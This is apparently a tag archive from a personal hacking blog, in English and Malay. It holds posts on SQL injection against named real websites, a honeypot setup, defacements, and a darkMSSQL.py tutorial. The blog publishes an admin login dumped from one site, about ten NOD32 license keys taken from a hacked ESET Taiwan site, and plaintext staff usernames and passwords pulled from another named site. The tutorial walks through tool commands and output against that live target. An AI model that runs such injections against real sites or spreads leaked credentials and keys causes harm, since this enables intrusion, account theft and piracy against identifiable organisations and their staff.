Tag Archives: pwn

SQLI – buyamotor[dot]com[dot]my

Almost a decade ago I left this things..

Target:              http://www.buyamotor.com.my/motor.php?cat=53
Host IP:            42.1.60.81
Current DB:     buyamoto_buym
Data Bases:      information_schema
                         buyamoto_buym

Data Found:
admin_email | admin_id | admin_user | admin_pwd
[email protected] | 1 | admin | adminpassword

But luckily I didn’t manage to find the admin page.. 🙁 

Honeypot after 1 week hosted..

So, I spend my holiday installing & configuring honeypot at my new vps.
I managed to installed Dionaea, Kippo, p0f (still has error permission denied T__T) & thug.
And for the interfaces, I install DionaeaFR and Kippo-Graph on my honeypot.

Currently I still on research for smtp honeypot. If you have 1, please do suggest to me. 🙂

 Dionaea. 4 unique URL for malware download. 9 malware binaries captured.

Kippo. Total login attempts : 7478. Distinct source IP addresses : 19

ESET Nod32 Taiwan pwn! :)

Today, another Nod32 website has been pwnd/hacked..

Here is the screenshot :

ESET NOD32 Taiwan

So, in this peaceful day, i have something give for you all.. 🙂

new_key=J112-mgf7f4r8u   org_key=J102-e4rdefyr5
new_key=J112-r6w87jwy2   org_key=J102-e5xzgsrfw
new_key=J112-spgbw2j5w   org_key=J102-e7tj8p3ww
new_key=J112-p94sfm3yt   org_key=J102-e83dteggq
new_key=J112-tm6v4yttt   org_key=J102-e9wwn8h4f
new_key=J112-uwwqk7vjy   org_key=J102-eax58prwg
new_key=J112-syw3wr7wp   org_key=J102-eb5c58mkj
new_key=J112-e4u6emunx   org_key=J102-ebcekvqed
new_key=J112-tsaudq3cy   org_key=J102-ecnf7u3ue
new_key=J112-ycbmr376x   org_key=J102-ecnhq856w

Brand new NOD32 key.. ahaha..

This thing really annoying me..

Why?

Because their website security is really low..

They dont manage their db very well..

I just wondering why they put important files like serial key, password, username, and others important files in their database without encrypting it..

Like some of the db that i found, mostly they dont encrypt their password..

Sound bad to me.. 🙂

Anyway, see you next time!

Assalamualaikum.. 🙂

Heraldonline.com & Mahkamah.gov.my pwnd!

1st topic.

This website has been hacked on 4th of January 2010, two days after a High Court decision allowing Catholics to use “Allah” to describe the Christian God in the national language. WTF!?

For more stories about what is happening, just go to Herald Malaysia and read out the stories inside.. 🙂

2nd topic.

This is another website that have been hacked on 7th of January 2010, just 3 days after the Herald Malaysia been pawned.

Just my opinion, I think this action is because court’s decision that allow The Herald to use the word ‘Allah’ in its publication.

More news in here and here.

Huh! What a long journey for the 1st week of 2010..

Baru masuk tahun baru, dah macam-macam kes berlaku..

Macam-macam hal la..

p/s : Kepada pembaca sekalian, saya harap anda dapat nilai apa isi tersirat yang sebenarnya saya ingin sampaikan dalam artikel ini..

darkMSSQL tutorial

Hari ini aku nak tunjukkan macam mana cara menggunakan darkMSSQL.py…

benda ni digunakan untuk MSSQL database yang ade error..
Aku jarang jumpa database MSSQL yang ada error..
Kalau jumpa pun, nasib2 je..

Tu agaknya pemalas sangat la tu Web Admin dia..
Server GMi pun pakai server jenis MSSQL jgk..
Oppss! Sori! :p

Apa2 pun, jom kita tengok macam mana aku gunakan darkMSSQL.py ni..

darkMSSQL.py journey… begin…


-h command (help)
Usage: ./darkMSSQL.py [options]                       rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --info    Gets MySQL server configuration only.
Define: --dbs     Shows all databases user has access too.
Define: --schema  Enumerate Information_schema Database.
Define: --dump    Extract information from a Database, Table and Column.
Define: --insert  Insert data into specified db, table and column(s).

Required:
Define: -u        URL "www.site.com/news.asp?id=2" or "www.site.com/index.asp?id=news'"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is darkMSSQLlog.txt
Define: -r        "-r 20" this will make the script resume at row 20 during dumping
Define: --cookie  "cookie_file.txt"
Define: --debug   Prints debug info to terminal.

Ex: ./darkMSSQL.py --info -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --dbs -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --schema -u "www.site.com/news.asp?id=2" -D dbname
Ex: ./darkMSSQL.py --dump -u "www.site.com/news.asp?id=2" -D dbname -T tablename -C username,password
Ex: ./darkMSSQL.py -u "www.site.com/news.asp?news=article'" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass

[email protected]:~/Desktop$ python darkMSSQL.py --info -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs... Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dbs -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --schema -D mylittletail_db -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dump -D mylittletail_db -T users -C username,password -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don't forget to check darkMSSQLlog.txt

korang paham x bnd ni?

klu x paham, bole tny aku..

bukannya susah sgt pn.. 😀

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂